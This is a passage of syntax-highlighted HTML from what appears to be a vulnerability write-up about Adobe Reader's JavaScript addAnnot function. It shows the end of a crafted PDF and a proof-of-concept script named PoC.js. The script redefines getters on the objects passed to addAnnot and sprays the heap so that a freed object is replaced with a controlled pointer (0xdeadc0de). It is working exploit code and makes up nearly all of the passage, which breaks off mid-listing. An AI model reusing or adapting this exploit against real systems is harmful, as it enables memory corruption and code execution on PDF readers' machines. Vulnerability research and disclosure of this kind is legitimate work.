class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;read&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_read<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-130\"><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">__defineGetter__<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;write&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2_write<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-131\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-132\"><span class=\"crayon-v\">app<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;crash @ 0xdeadc0de&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-133\"><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addAnnot<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;rect&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Highlight&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-134\"><span class=\"crayon-v\">app<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;no crash!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-135\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-136\"><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-137\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-138\"><span class=\"crayon-e\">endobj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-139\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-140\"><span class=\"crayon-i\">xref<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-141\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-142\"><span class=\"crayon-cn\">0000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">65535<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">f<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-143\"><span class=\"crayon-cn\">0000000012<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-144\"><span class=\"crayon-cn\">0000000109<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-145\"><span class=\"crayon-cn\">0000000165<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-146\"><span class=\"crayon-cn\">0000000234<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-147\"><span class=\"crayon-cn\">0000000412<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-148\"><span class=\"crayon-cn\">0000000526<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-149\"><span class=\"crayon-cn\">0000000650<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-150\"><span class=\"crayon-v\">trailer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-151\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-152\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-153\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-154\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-155\"><span class=\"crayon-i\">startxref<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-156\"><span class=\"crayon-cn\">2504<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-157\"><span class=\"crayon-o\">%<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">EOF<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0143 seconds] -->  <\/p>\n<p><u>PoC.js<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598b8a5d14416329607661\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> console.show();  function log(s) {   \tconsole.println(&#8220;-&gt; &#8221; + s.toString());   \tMath.atan(s.toString());  }    function ptr2str(ptr)  {  \t\/*  \tin: pointer  \tout: 2-char string which represents this pointer on the heap  \t*\/  \tp1 = (((ptr &gt;&gt; 24) &gt;&gt;&gt; 0) &amp; 0xff).toString(16);  \tif(p1.length == 1) p1 = &#8220;0&#8221; + p1;  \tp2 = ((ptr &gt;&gt; 16) &amp; 0xff).toString(16);  \tif(p2.length == 1) p2 = &#8220;0&#8221; + p2;  \tp3 = ((ptr &gt;&gt; 8) &amp; 0xff).toString(16);  \tif(p3.length == 1) p3 = &#8220;0&#8221; + p3;  \tp4 = (ptr &amp; 0xff).toString(16);  \tif(p4.length == 1) p4 = &#8220;0&#8221; + p4;  \treturn eval(&#8220;unescape(&#8216;%u&#8221; + p3+p4 + &#8220;%u&#8221; + p1+p2 + &#8220;&#8216;)&#8221;);  }    basestring = unescape(&#8220;%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa%uaaaa&#8221;) + ptr2str(0xdeadc0de &#8211; 0x18);  while(basestring.length &lt; 0x100) basestring += unescape(&#8220;%ueeee&#8221;);    function allocs(count, size, basestring)  {  \tarr = [];  \tfor(var i=0; i &lt; count; i++) arr.push(basestring.substr(0, (size &#8211; 2) \/ 2).toUpperCase());  \treturn arr;  }    globarr = [];    function somefunc(){}    function obj1_read()  {  \tlog(&#8220;[obj1_read], get read property&#8221;);  \tglobarr.push(allocs(0x200, 0x88, basestring));  \treturn undefined;  }    function obj1_write()  {  \tlog(&#8220;[obj1_write], get write property&#8221;);  \treturn somefunc;  }    function obj2_read()  {  \tlog(&#8220;[obj2_read], get read property&#8221;);  \treturn undefined;  }    function obj2_write()  {  \tlog(&#8220;[obj2_write], get write property&#8221;);  \treturn somefunc;  }    obj1 = new Object();  obj1.__defineGetter__(&#8220;read&#8221;, obj1_read);  obj1.__defineGetter__(&#8220;write&#8221;, obj1_write);  obj2 = new Object();  obj2.__defineGetter__(&#8220;read&#8221;, obj2_read);  obj2.__defineGetter__(&#8220;write&#8221;, obj2_write);    app.alert(&#8220;crash @ 0xdeadc0de&#8221;);  this.addAnnot( { &#8220;name&#8221; : obj1, &#8220;rect&#8221; : obj2, &#8220;type&#8221; : &#8220;Highlight&#8221;});  app.alert(&#8220;no crash!&#8221;);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14416329607661-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14416329607661-72\">72<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-1\"><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">show<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-2\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">println<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;-&gt; &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">Math<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">atan<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-5\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-7\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ptr2str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-8\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-10\"><span class=\"crayon-c\">\tin: pointer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-11\"><span class=\"crayon-c\">\tout: 2-char string which represents this pointer on the heap<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-12\"><span class=\"crayon-c\">\t*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14416329607661-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p3<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14416329607661-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">p4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><span 